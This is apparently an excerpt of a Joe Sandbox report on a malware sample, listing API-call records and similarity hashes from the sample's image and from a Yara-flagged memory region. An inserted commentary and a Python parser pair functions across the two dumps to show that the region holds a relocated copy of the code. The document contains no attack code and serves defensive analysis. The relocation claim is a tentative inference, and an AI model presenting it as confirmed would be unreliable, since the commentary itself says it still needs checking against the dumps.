  • Part of subcall function 04855161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 0485517E
  • Part of subcall function 04855161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 04855193
• Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 048561C7
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 048561F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
• String ID: 11@
• API String ID: 2684344702-1785270423
• Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
• Instruction ID: 02e7c3b8183ac45d68bb455282117a46d2e27ed14867301f57c3c8e7c9b21ebf
• Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
• Instruction Fuzzy Hash: BE01D675600219ABCF01EF58C4809AE77FAEF89354B5005A5EC06EB301EA70FE059BA0
APIs
• Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
  • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
  • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
• Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
• String ID: 11@
• API String ID: 2524916244-1785270423
• Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
• Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
• Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
• Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
APIs
• Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 04841DC9
  • Part of subcall function 04840CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 04840CEB
  • Part of subcall function 04840CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 04840CF5
• Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 04841DE2
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 04841E28
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
• String ID: 11@
• API String ID: 2524916244-1785270423
• Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
• Instruction ID: 652297b377e16ee038a46f42b4584f494525dfe9996102f46943e03fce33e8d3
• Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
• Instruction Fuzzy Hash: 03018079A0022C8BEF15AB58C45C7AEB372AFC5354F184A55C901EB344DFB4BA45CB92
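Two things are visible when the records for the 0x00400000 image (based on PE: true) and the 0x04830000 region (based on PE: false, with Yara matches) are read side by side. The Opcode ID, which masks operands, is identical for the SchedulingRing pair and for the _NonReentrantPPLLock pair above while the Instruction ID differs, and every first call site in the 0x04830000 copy sits exactly 0x4430267 bytes above its counterpart in the image (0x04841DC9 - 0x00411B62, 0x04856194 - 0x00425F2D and 0x0485F9DA - 0x0042F773 all give that value): the region holds a relocated copy of the same code, displaced 0x267 bytes more than the difference of the two base addresses, which is worth checking against the dumps before treating the region as a plain image copy. The two GetModuleFileNameW records show the limit of Opcode ID matching: same API String ID, same displacement, different Opcode ID. The Python below is an added example, not tooling from Joe Sandbox: it parses records in the report's own layout, pairs functions across dumps by Opcode ID, derives the displacement, and then uses API String ID plus that displacement to recover pairs the Opcode ID misses. The sample input is five records copied from this page and trimmed to the fields the parser reads; the function and field names are mine.

```python
import re

# Five records copied from the report above, trimmed to the fields this parser
# reads ("Part of subcall" lines are callee detail and are skipped anyway).
SAMPLE_REPORT = r"""
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TP77MvSzt2.exe,00000104), ref: 0042F773
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 2506810119-2945471316
• Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
• Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TP77MvSzt2.exe,00000104), ref: 0485F9DA
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
• API String ID: 2506810119-2945471316
• Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
• Instruction ID: d018937cadfcb1c3da1bcb078f73801defd8d5085eb9384552afb4c02a029d30
APIs
• Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 2524916244-1785270423
• Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
• Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
APIs
• Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 04841DC9
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
• API String ID: 2524916244-1785270423
• Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
• Instruction ID: 652297b377e16ee038a46f42b4584f494525dfe9996102f46943e03fce33e8d3
APIs
• SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 1452528299-1277599000
• Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
• Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
"""

RECORD_SPLIT = re.compile(r"^APIs[ \t]*$", re.M)   # every record opens with "APIs"
FIELDS = {
    "offset": re.compile(r"Offset:\s*([0-9A-Fa-f]{8})"),
    "based_on_pe": re.compile(r"based on PE:\s*(true|false)"),
    "api_string_id": re.compile(r"API String ID:\s*(\d+-\d+)"),
    "opcode_id": re.compile(r"Opcode ID:\s*([0-9a-f]{64})"),
    "instruction_id": re.compile(r"Instruction ID:\s*([0-9a-f]{64})"),
}
REF = re.compile(r"ref:\s*([0-9A-Fa-f]{8})")

def parse_records(text):
    """One dict per function record. first_ref is the function's own first API
    call site; it moves with the code when the code is copied elsewhere."""
    records = []
    for chunk in RECORD_SPLIT.split(text):
        if "Opcode ID" not in chunk:
            continue
        rec = {name: (m.group(1) if (m := rx.search(chunk)) else None)
               for name, rx in FIELDS.items()}
        rec["offset"] = int(rec["offset"], 16)
        refs = [int(REF.search(line).group(1), 16) for line in chunk.splitlines()
                if "ref:" in line and "Part of subcall" not in line]
        rec["first_ref"] = refs[0] if refs else None
        records.append(rec)
    return records

def pair_by(records, key):
    """Records sharing `key` but living in different dumps; delta is how far the
    first call site moved between the lower and the higher copy."""
    groups = {}
    for rec in records:
        groups.setdefault(rec[key], []).append(rec)
    pairs = []
    for value, group in groups.items():
        group = sorted(group, key=lambda r: r["offset"])
        low, high = group[0], group[-1]
        if low["offset"] == high["offset"]:
            continue
        pairs.append({"key": value, "low": low, "high": high,
                      "delta": high["first_ref"] - low["first_ref"]})
    return pairs

def displacement(records):
    """Constant displacement between the image and its copy, taken from the
    Opcode ID pairs; None if the pairs disagree or there are none."""
    deltas = {p["delta"] for p in pair_by(records, "opcode_id")}
    return deltas.pop() if len(deltas) == 1 else None

def relocated_functions(records):
    """Opcode ID pairs, plus API String ID pairs whose call site moved by the same
    displacement (recovers copies whose Opcode ID differs, as with the two
    GetModuleFileNameW records)."""
    delta = displacement(records)
    if delta is None:
        return []
    seen, result = set(), []
    for key in ("opcode_id", "api_string_id"):
        for p in pair_by(records, key):
            ids = (p["low"]["instruction_id"], p["high"]["instruction_id"])
            if p["delta"] == delta and ids not in seen:
                seen.add(ids)
                result.append(p)
    return result

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(hex(displacement(recs)))
    for p in relocated_functions(recs):
        print(hex(p["low"]["first_ref"]), "->", hex(p["high"]["first_ref"]), p["key"])
```

Feed it the whole function listing of the report (the records keep the same field labels throughout) and the displacement check turns "this region has Yara matches" into a statement about which functions of the original image were copied there; anything in the 0x04830000 region with no partner in the image is the part worth reversing first.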
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@$pContext
                                                                                  • API String ID: 1687795959-1086721755
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,0486011C,00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002), ref: 0486018B
                                                                                  • GetProcAddress.KERNEL32(00000000,004496C4), ref: 0486019E
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0486011C,00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002), ref: 048601C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: 11@
                                                                                  • API String ID: 4061214504-1785270423
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0483C903
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                  • API String ID: 2005118841-1866435925
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                  • String ID: f(@
                                                                                  • API String ID: 3213686812-2560262586
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catchmake_shared
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3472968176-2084237596
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                  • String ID: f(@
                                                                                  • API String ID: 3213686812-2560262586
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                  • String ID: pScheduler
                                                                                  • API String ID: 1381464787-923244539
                                                                                  APIs
                                                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0484E8C6
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0484E8D9
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0484E8E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1990795212-1785270423
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                                                  • _free.LIBCMT ref: 0042E089
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFreeHandleLibrary_free
                                                                                  • String ID: -B
                                                                                  • API String ID: 621396759-1993606306
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: pScheduler$version
                                                                                  • API String ID: 1687795959-3154422776
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0486049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 04866B71
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04866BFA
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04866C0C
                                                                                  • __freea.LIBCMT ref: 04866C15
                                                                                    • Part of subcall function 0486392E: RtlAllocateHeap.NTDLL(00000000,0483DAFC,00000000), ref: 04863960
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                  • String ID:
                                                                                  • API String ID: 2652629310-0
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000005), ref: 00401FCB
                                                                                  • UpdateWindow.USER32 ref: 00401FD3
                                                                                  • ShowWindow.USER32(00000000), ref: 00401FE7
                                                                                  • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$MoveUpdate
                                                                                  • String ID:
                                                                                  • API String ID: 1339878773-0
                                                                                  • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                  • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                                                  • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                  • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                                                    • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                                                    • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                  • String ID:
                                                                                  • API String ID: 737400349-0
                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0485936A
                                                                                    • Part of subcall function 048592B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 048592E6
                                                                                    • Part of subcall function 048592B7: ___AdjustPointer.LIBCMT ref: 04859301
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0485937F
                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 04859390
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 048593B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                  • String ID:
                                                                                  • API String ID: 737400349-0
                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction ID: 3258577d6a8e24dcbbbbadb9141d5fb9a156d2a81f2a4454874c4283747f4ebb
                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction Fuzzy Hash: 8B01F3B2100148BBDF125F998C40DEB3BAAEF48758F044A14FE08A6130D672E861DBA1
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                                                  • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0486515D,00000000,00000000,00000000,00000000,?,04865415,00000006,0044A378), ref: 048651E8
                                                                                  • GetLastError.KERNEL32(?,0486515D,00000000,00000000,00000000,00000000,?,04865415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,04862233), ref: 048651F4
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0486515D,00000000,00000000,00000000,00000000,?,04865415,00000006,0044A378,0044A370,0044A378,00000000), ref: 04865202
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction ID: ecb4268de37a03e7928ebe33f7ff5ac55c936ca769ac81fd77faa31a720c7aa3
                                                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction Fuzzy Hash: 8501D43A611226BBC7618F79BC45A577798AF06FA2B100B30F917E3344D720E900CAE8
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                  • String ID:
                                                                                  • API String ID: 78362717-0
                                                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 048563CF
                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 048563E3
                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 048563FB
                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 04856413
